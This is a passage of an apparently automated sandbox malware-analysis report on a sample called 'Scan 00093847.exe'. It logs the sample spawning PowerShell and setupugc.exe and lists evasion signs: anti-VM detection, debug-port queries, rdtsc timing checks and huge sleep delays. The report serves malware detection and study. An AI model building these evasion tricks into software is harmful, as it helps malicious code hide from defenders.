            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Scan 00093847.exe PID: 5480, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 8150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 9150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 9310000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: A310000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD1C0 rdtsc 3_2_010FD1C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5411Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 931Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeWindow / User API: threadDelayed 9834Jump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\setupugc.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\Scan 00093847.exe TID: 6528Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5808Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5812Thread sleep count: 139 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5812Thread sleep time: -278000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5812Thread sleep count: 9834 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5812Thread sleep time: -19668000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe TID: 764Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe TID: 764Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0326C520 FindFirstFileW,FindNextFileW,FindClose,9_2_0326C520
            Source: C:\Users\user\Desktop\Scan 00093847.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: uspEUeZyrqFDmi.exe, 0000000B.00000002.3553310155.0000000000C4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: setupugc.exe, 00000009.00000002.3552722555.0000000003595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 0000000C.00000002.2362899484.000002139BE6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD1C0 rdtsc 3_2_010FD1C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_00417733 LdrLoadDll,3_2_00417733
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01140115 mov eax, dword ptr fs:[00000030h]3_2_01140115
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112A118 mov ecx, dword ptr fs:[00000030h]3_2_0112A118
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112A118 mov eax, dword ptr fs:[00000030h]3_2_0112A118
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112A118 mov eax, dword ptr fs:[00000030h]3_2_0112A118
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112A118 mov eax, dword ptr fs:[00000030h]3_2_0112A118
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B0124 mov eax, dword ptr fs:[00000030h]3_2_010B0124
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B136 mov eax, dword ptr fs:[00000030h]3_2_0107B136
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B136 mov eax, dword ptr fs:[00000030h]3_2_0107B136
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B136 mov eax, dword ptr fs:[00000030h]3_2_0107B136
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B136 mov eax, dword ptr fs:[00000030h]3_2_0107B136
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01081131 mov eax, dword ptr fs:[00000030h]3_2_01081131
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01081131 mov eax, dword ptr fs:[00000030h]3_2_01081131
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155152 mov eax, dword ptr fs:[00000030h]3_2_01155152
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079148 mov eax, dword ptr fs:[00000030h]3_2_01079148
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079148 mov eax, dword ptr fs:[00000030h]3_2_01079148
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079148 mov eax, dword ptr fs:[00000030h]3_2_01079148
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079148 mov eax, dword ptr fs:[00000030h]3_2_01079148
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107C156 mov eax, dword ptr fs:[00000030h]3_2_0107C156
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01114144 mov eax, dword ptr fs:[00000030h]3_2_01114144
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01114144 mov eax, dword ptr fs:[00000030h]3_2_01114144
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01114144 mov ecx, dword ptr fs:[00000030h]3_2_01114144
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01114144 mov eax, dword ptr fs:[00000030h]3_2_01114144
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01114144 mov eax, dword ptr fs:[00000030h]3_2_01114144
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01087152 mov eax, dword ptr fs:[00000030h]3_2_01087152
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01086154 mov eax, dword ptr fs:[00000030h]3_2_01086154
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01086154 mov eax, dword ptr fs:[00000030h]3_2_01086154
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01119179 mov eax, dword ptr fs:[00000030h]3_2_01119179
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C0185 mov eax, dword ptr fs:[00000030h]3_2_010C0185
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110019F mov eax, dword ptr fs:[00000030h]3_2_0110019F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110019F mov eax, dword ptr fs:[00000030h]3_2_0110019F
